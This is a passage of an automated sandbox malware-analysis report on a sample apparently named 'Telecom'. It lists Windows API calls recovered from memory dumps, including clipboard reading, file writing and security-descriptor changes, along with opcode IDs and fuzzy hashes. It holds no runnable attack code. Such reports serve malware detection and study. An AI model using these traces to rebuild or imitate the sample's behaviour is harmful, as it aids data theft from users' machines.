                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                      • Instruction ID: 3546b2b014cc88f35133d6c6db0e84e0762a5c1c2dbf1d1be635acdb75ec0361
                                                      • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                      • Instruction Fuzzy Hash: 91F0F87550020DFFDF05DF90C941E9E7BB9FB04318F208449F9159A251D33AEA22ABA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,004841D5,00504600,00000002), ref: 004AD5D1
                                                        • Part of subcall function 004AD4E2: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,004AD5C4,?,?,?), ref: 004AD504
                                                        • Part of subcall function 004AD4E2: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,004AD5C4,?,?,?,?,004841D5,00504600,00000002), ref: 004AD519
                                                        • Part of subcall function 004AD4E2: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,004AD5C4,?,?,?,?,004841D5,00504600,00000002), ref: 004AD525
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$Write
                                                      • String ID:
                                                      • API String ID: 3847668363-0
                                                      • Opcode ID: 96f5a814df69a41b15158de5ca39eca932a701e20285d17d4d9dfe19362caf52
                                                      • Instruction ID: 71b244fe1016791a8f320725489ecccf9e2a2d93628a4fdcd1c263c6274af7ff
                                                      • Opcode Fuzzy Hash: 96f5a814df69a41b15158de5ca39eca932a701e20285d17d4d9dfe19362caf52
                                                      • Instruction Fuzzy Hash: B0E03976800604FFCB219F5AD84089AB7F8FF85320310852FE95682510D7B5AA04DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00443963
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_
                                                      • String ID:
                                                      • API String ID: 1144537725-0
                                                      • Opcode ID: a8bbe41b68e7447092b4217e93491864aaf3346d3b2f0c3fea0121ea83cdde88
                                                      • Instruction ID: 413c108692264939e52e1a70f0b1473215aca4f3a483caf1baae07bfb274a643
                                                      • Opcode Fuzzy Hash: a8bbe41b68e7447092b4217e93491864aaf3346d3b2f0c3fea0121ea83cdde88
                                                      • Instruction Fuzzy Hash: 58F0A7B09003049FE7529F24DC457D67BBCA70170CF0040AAA24496281D774479CCF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,?,0044B1AE,?,?,00000000,?,00446CC0,?), ref: 0045F1A5
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 08b76722d3862351c2d027e7f89620b002780940ac2001ed75274035c9ac02c9
                                                      • Instruction ID: d3c538042de9279abeaca1a35b99b8ef8c6d0b17b071d5fa21aac9262e46794b
                                                      • Opcode Fuzzy Hash: 08b76722d3862351c2d027e7f89620b002780940ac2001ed75274035c9ac02c9
                                                      • Instruction Fuzzy Hash: 98E092B5910704AFD728DF55D846D9BBBF8EB08310B00456EA85693740E7B1BD448B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00443A76
                                                        • Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_wcslen
                                                      • String ID:
                                                      • API String ID: 541455249-0
                                                      • Opcode ID: 5e90a385b9578d25e28156597cebc485ad732714b6365b5e364478726505b5ee
                                                      • Instruction ID: 748c2ecde13a0151d031aec0fb1f80ade1c1dc8d18b2791f5cd38b9977282642
                                                      • Opcode Fuzzy Hash: 5e90a385b9578d25e28156597cebc485ad732714b6365b5e364478726505b5ee
                                                      • Instruction Fuzzy Hash: 63E0CD72A0012457C710A2599C05FEE77DDDFC87A4F0440B6FC05D7254D974DD808694
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 004AE857
                                                        • Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FolderPath_wcslen
                                                      • String ID:
                                                      • API String ID: 2987691875-0
                                                      • Opcode ID: 30c88b479262959cc4fc99e1ee90d60437a86dfc1245cd58f883dc2621e07755
                                                      • Instruction ID: 237cf33e42d02debbad2e78dc9fc201685cbeaab1028a9629fbc2eda7b46a85a
                                                      • Opcode Fuzzy Hash: 30c88b479262959cc4fc99e1ee90d60437a86dfc1245cd58f883dc2621e07755
                                                      • Instruction Fuzzy Hash: 0BD05EA19002283BEF60A6759C0DDBB3AACC740214F0006A5786DD3152EA34EE4486A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindCloseChangeNotification.KERNEL32(?,?,00000000,00483A42), ref: 00447ACB
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 07f35687f6d35359a4c571fb1bb5eac66522e92f6a285f238d20904c04ee05aa
                                                      • Instruction ID: 7be4e7a5475d560a0286ac31e8b89db221ad54a690cc6f15a5c99d7c7cffe0ad
                                                      • Opcode Fuzzy Hash: 07f35687f6d35359a4c571fb1bb5eac66522e92f6a285f238d20904c04ee05aa
                                                      • Instruction Fuzzy Hash: CAE0B675404B01DFD7318F2AE804416FBF4FFD13613204A2FD5E5A2660D3B45986CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,004ADAC7,?,?), ref: 004ADB5D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CopyFile
                                                      • String ID:
                                                      • API String ID: 1304948518-0
                                                      • Opcode ID: a7d933d24e70b698ef212c714abbc397f12ef355793d2809ac01d2e84c9b78bc
                                                      • Instruction ID: eff2c8400103c729e34f15144cd3fb5c8f9f54254927ff3538c33c6245335c1a
                                                      • Opcode Fuzzy Hash: a7d933d24e70b698ef212c714abbc397f12ef355793d2809ac01d2e84c9b78bc
                                                      • Instruction Fuzzy Hash: EED0A7305D0208BBEF108B90CC03F99B7ACE701B45F1041A4B101EA0D0C7B5A5089724
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,00000000,?,00480A84,?,?,00000000,?,00480A84,00000000,0000000C), ref: 00480737
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: fb653239dc6a668f12108013a7471913abf4f57c4f07d869638f8517b4aa336a
                                                      • Instruction ID: 65b3cfa1ee1c627c04c02a84424bea5baa760d56985675bc917f4859e362a8f8
                                                      • Opcode Fuzzy Hash: fb653239dc6a668f12108013a7471913abf4f57c4f07d869638f8517b4aa336a
                                                      • Instruction Fuzzy Hash: A5D06C3200010DBBDF028F84DD06EDA3BAAFB48714F014010BE1856020C732E821AB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,004AD840), ref: 004AEAB1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: cc45d2e2dac664cc91fc5178aa854c676236f8b8f0d21694cd4300afff30db05
                                                      • Instruction ID: 183cb912dff398070ce466fd02f75f8471547fe350369de24a240795e4505fef
                                                      • Opcode Fuzzy Hash: cc45d2e2dac664cc91fc5178aa854c676236f8b8f0d21694cd4300afff30db05
                                                      • Instruction Fuzzy Hash: F7B0922440160005AD280A7A5A099AB330078E33A57DC1BC2E479852E1C33D880FA958
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00446FA2: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00443BC9,?,00008000), ref: 00446FD0
                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 004B8123
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CreateErrorFileLast
                                                      • String ID:
                                                      • API String ID: 1214770103-0
                                                      • Opcode ID: 18d80312da9ef2a83a60a1fb1a1b04dafbf76d4e8961d089bec00496c2593821
                                                      • Instruction ID: 3608b96e705c8aa580e2ac9da1ad2a0a69d98bb01ba80bf3ed218b42493ce6d2
                                                      • Opcode Fuzzy Hash: 18d80312da9ef2a83a60a1fb1a1b04dafbf76d4e8961d089bec00496c2593821
                                                      • Instruction Fuzzy Hash: D88190306043019FD714EF25C491AAEB7E4BF85354F05455EF8865B392CB38ED49CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004ADC54: FindFirstFileW.KERNEL32(?,?), ref: 004ADCCB
                                                        • Part of subcall function 004ADC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 004ADD1B
                                                        • Part of subcall function 004ADC54: FindNextFileW.KERNEL32(00000000,00000010), ref: 004ADD2C
                                                        • Part of subcall function 004ADC54: FindClose.KERNEL32(00000000), ref: 004ADD43
                                                      • GetLastError.KERNEL32 ref: 004B666E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                      • String ID:
                                                      • API String ID: 2191629493-0
                                                      • Opcode ID: 3033e67046fd744a2977efe42b8c9b5298ce59609e43cb2a09e40a44eac570c4
                                                      • Instruction ID: 87f8090c21ed03e23411b42260dad417972b76eefe845d506c4d95d9a82f1457
                                                      • Opcode Fuzzy Hash: 3033e67046fd744a2977efe42b8c9b5298ce59609e43cb2a09e40a44eac570c4
                                                      • Instruction Fuzzy Hash: 5FF08C366002008FDB14EF5AD845B6EB7E5AF98324F05841EF90A8B352CB78BC01CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(?,00000408,00000000,00000000), ref: 004D5391
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004D53A6
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004D53C5
                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 004D53E9
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004D53FA
                                                      • SendMessageW.USER32(?,00000149,00000000,00000000), ref: 004D5419
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004D544C
                                                      • SendMessageW.USER32(?,0000133C,00000000,?), ref: 004D5472
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004D54AD
                                                      • SendMessageW.USER32(?,0000113E,00000000,00000004), ref: 004D54F4
                                                      • SendMessageW.USER32(?,0000113E,00000000,00000004), ref: 004D551C
                                                      • IsMenu.USER32(?), ref: 004D5535
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004D5590
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004D55BE
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004D5632
                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 004D5681
                                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 004D5720
                                                      • wsprintfW.USER32 ref: 004D574C
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004D5767
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 004D578F
                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004D57B1
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004D57D1
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 004D57F8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                      • String ID: %d/%02d/%02d$0
                                                      • API String ID: 4054740463-4206205729
                                                      • Opcode ID: ac665cd7f244ae3f2c765765ab1415cc96b49a2d2403696294824ae5d7386bb1
                                                      • Instruction ID: 1ff24cdc0027663cb6b672be1f5adefedab4d93c5727887ababe598fbee1044e
                                                      • Opcode Fuzzy Hash: ac665cd7f244ae3f2c765765ab1415cc96b49a2d2403696294824ae5d7386bb1
                                                      • Instruction Fuzzy Hash: 8712FF71900614ABEB259F28DC99FAF7BE8EF85310F10426BF515EA3D0DB788941CB18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004A1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004A1A60
                                                        • Part of subcall function 004A1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,004A14E7,?,?,?), ref: 004A1A6C
                                                        • Part of subcall function 004A1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004A14E7,?,?,?), ref: 004A1A7B
                                                        • Part of subcall function 004A1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004A14E7,?,?,?), ref: 004A1A82
                                                        • Part of subcall function 004A1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004A1A99
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004A1518
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004A154C
                                                      • GetLengthSid.ADVAPI32(?), ref: 004A1563
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 004A159D
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004A15B9
                                                      • GetLengthSid.ADVAPI32(?), ref: 004A15D0
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 004A15D8
                                                      • HeapAlloc.KERNEL32(00000000), ref: 004A15DF
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004A1600
                                                      • CopySid.ADVAPI32(00000000), ref: 004A1607
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004A1636
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004A1658
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004A166A
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004A1691
                                                      • HeapFree.KERNEL32(00000000), ref: 004A1698
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004A16A1
                                                      • HeapFree.KERNEL32(00000000), ref: 004A16A8
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004A16B1
                                                      • HeapFree.KERNEL32(00000000), ref: 004A16B8
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004A16C4
                                                      • HeapFree.KERNEL32(00000000), ref: 004A16CB
                                                        • Part of subcall function 004A1ADF: GetProcessHeap.KERNEL32(00000008,004A14FD,?,00000000,?,004A14FD,?), ref: 004A1AED
                                                        • Part of subcall function 004A1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,004A14FD,?), ref: 004A1AF4
                                                        • Part of subcall function 004A1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004A14FD,?), ref: 004A1B03
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: 22dbad9b20eb2635f3ae39f97894441f2b3f1d96c543121f5bfa0030aab864aa
                                                      • Instruction ID: d8af7ed90ed84adb91895f02a456a9d6f3cec337a39ea97b038c00527838fe2b
                                                      • Opcode Fuzzy Hash: 22dbad9b20eb2635f3ae39f97894441f2b3f1d96c543121f5bfa0030aab864aa
                                                      • Instruction Fuzzy Hash: 07716BB2901209BBDF109FA5DC48FAFBBB8FF55344F084526E915E62A0D7349905CBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • OpenClipboard.USER32(004DDCD0), ref: 004BF586
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 004BF594
                                                      • GetClipboardData.USER32(0000000D), ref: 004BF5A0
                                                      • CloseClipboard.USER32 ref: 004BF5AC
                                                      • GlobalLock.KERNEL32(00000000), ref: 004BF5E4
                                                      • CloseClipboard.USER32 ref: 004BF5EE
                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 004BF619
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 004BF626
                                                      • GetClipboardData.USER32(00000001), ref: 004BF62E
                                                      • GlobalLock.KERNEL32(00000000), ref: 004BF63F
                                                      • GlobalUnlock.KERNEL32(00000000,?), ref: 004BF67F
                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 004BF695
                                                      • GetClipboardData.USER32(0000000F), ref: 004BF6A1
                                                      • GlobalLock.KERNEL32(00000000), ref: 004BF6B2
                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 004BF6D4
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004BF6F1
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004BF72F
                                                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 004BF750
                                                      • CountClipboardFormats.USER32 ref: 004BF771
                                                      • CloseClipboard.USER32 ref: 004BF7B6
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
